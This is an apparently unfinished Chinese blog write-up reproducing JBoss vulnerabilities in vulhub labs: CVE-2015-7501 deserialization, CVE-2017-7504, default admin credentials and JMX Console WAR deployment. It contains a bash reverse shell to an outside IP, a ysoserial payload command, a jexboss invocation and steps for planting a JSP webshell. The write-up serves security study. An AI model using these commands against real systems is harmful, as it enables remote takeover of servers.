Jboss漏洞

Jboss

Jboss介绍

JBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。

3.1 CVE-2015-7501

Jboss JMXInvokerServlet 反序列化漏洞

漏洞介绍
这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的 Gadget 执行任意代码
影响范围
JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
JBoss AS (Wildly) 6 and earlier
JBoss A-MQ 6.2.0
JBoss Fuse 6.2.0
JBoss SOA Platform (SOA-P) 5.3.1
JBoss Data Grid (JDG) 6.5.0
JBoss BRMS (BRMS) 6.1.0
JBoss BPMS (BPMS) 6.1.0
JBoss Data Virtualization (JDV) 6.1.0
JBoss Fuse Service Works (FSW) 6.0.0
JBoss Enterprise Web Server (EWS) 2.1,3.0
环境搭建
cd vulhub/jboss/JMXInvokerServlet-deserialization
docker-compose up -d

image-20240806212708834

漏洞复现
http://192.168.0.154:8080/

image-20240806213121558

1.POC,访问地址

http://192.168.0.154:8080/invoker/JMXInvokerServlet

返回如下,说明接⼝开放,此接⼝存在反序列化漏洞

image-20240806213235287

2.下载 ysoserial ⼯具进⾏漏洞利⽤

https://github.com/frohoff/ysoserial

将反弹shell进⾏base64编码

bash -i >&/dev/tcp/82.157.209.141/4444 0>&1
YmFzaCAtaSA+Ji9kZXYvdGNwLzgyLjE1Ny4yMDkuMTQxLzQ0NDQgMD4mMQ==
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzgyLjE1Ny4yMDkuMTQxLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i} " >exp.ser

3.2 CVE-2017-7504

环境搭建
cd vulhub/jboss/CVE-2017-7504 
docker-compose up -d

image-20240806215027128

漏洞复现

1.访问漏洞地址

http://192.168.0.154:8080/jbossmq-httpil/HTTPServerILServlet

image-20240806220030354

python3 jexboss.py -u http://192.168.0.154:8080/

3.4 Administration Console弱⼝令

漏洞描述

Administration Console管理⻚⾯存在弱⼝令,admin:vulhub,登陆后台上传war包 , getshell

影响版本

全版本

环境搭建
cd vulhub-master/jboss/CVE-2017-12149 
docker-compose up -d
密码⽂件
/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties
账户密码:admin:vulhub
漏洞复现
http://1.15.136.212:8080/admin-console/login.seam?conversationId=4

3.5 低版本JMX Console未授权

3.6 ⾼版本JMX Console未授权

漏洞描述

JMX Console默认存在未授权访问,直接点击JBoss主⻚中的 JMX Console 链接进⼊JMX Console⻚ ⾯, 通过部署war包 , getshell

影响版本

Jboss6.x以下

环境搭建
cd vulhub/jboss/CVE-2017-12149 
docker-compose up -d
漏洞复现

http://1.15.136.212:8080/jmx-console/

因为使⽤环境不存在该漏洞所以需要输⼊账户密码:admin vulhub

image-20240806183529472

1.本地搭建部署点

image-20240806183609367

2.进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署

image-20240806183801426

用冰蝎生成jsp木马—>压缩到zip中—>改后缀名为.war

image-20240806184231831

image-20240806184302305

image-20240806184728571

PS:完任务版。下次一定做完。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值